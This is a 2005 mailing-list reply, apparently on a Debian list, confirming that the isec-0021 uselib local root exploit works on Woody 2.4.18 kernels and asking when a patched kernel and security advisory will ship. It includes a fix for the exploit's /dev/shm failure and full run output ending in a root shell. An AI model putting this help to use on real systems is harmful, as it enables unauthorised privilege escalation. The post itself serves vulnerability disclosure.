Re: local root exploit
On Fri, 07 Jan 2005 23:55:15 +0100, Arnaud Loonstra <arnaud@sphaero.org>
wrote:
> Just tried the newly found exploits on a Woody system, it doesn't work...
> I get:
> [+] SLAB cleanup
> child 1 VMAs 143
> [+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
> [+] vmalloc area 0xc5000000 - 0xc9d17000
> [-] FAILED: open lib (/dev/shm/_elf_lib not writable?) (No such file or
> directory)
> Killed
>
> http://isec.pl/vulnerabilities/isec-0021-uselib.txt
>
> Any others any other findings?
>
> A. Loonstra
Hello,
I have tried the exploit and it works! It just needs to mount the /dev/shm
filesystem, or you can modify the exploit to put temporary file into /tmp/
instead of /dev/shm/
mount -t tmpfs tmpfs /dev/shm
After that:
$ ./elflbl
[+] SLAB cleanup
child 1 VMAs 65527
child 2 VMAs 9756
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xc4400000 - 0xc8401000
Wait... /
[+] race won maps=10368
expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xc48da000
[+] gate modified ( 0xffec90f4 0x0804ec00 )
[+] exploited, uid=0
sh-2.05a# whoami
root
sh-2.05a#
kerenels tested:
kernel-image-2.4.18-1-586tsc 2.4.18-13.1
kernel-image-2.4.18-bf2.4 (left from installation)
compiled with:
gcc-2.95 2.95.4-11woody1
So, now the qustion is, if backporting the patch is on the way and when we can
expect a DSA.
--
Best regards
Vladislav Kurz
Reply to: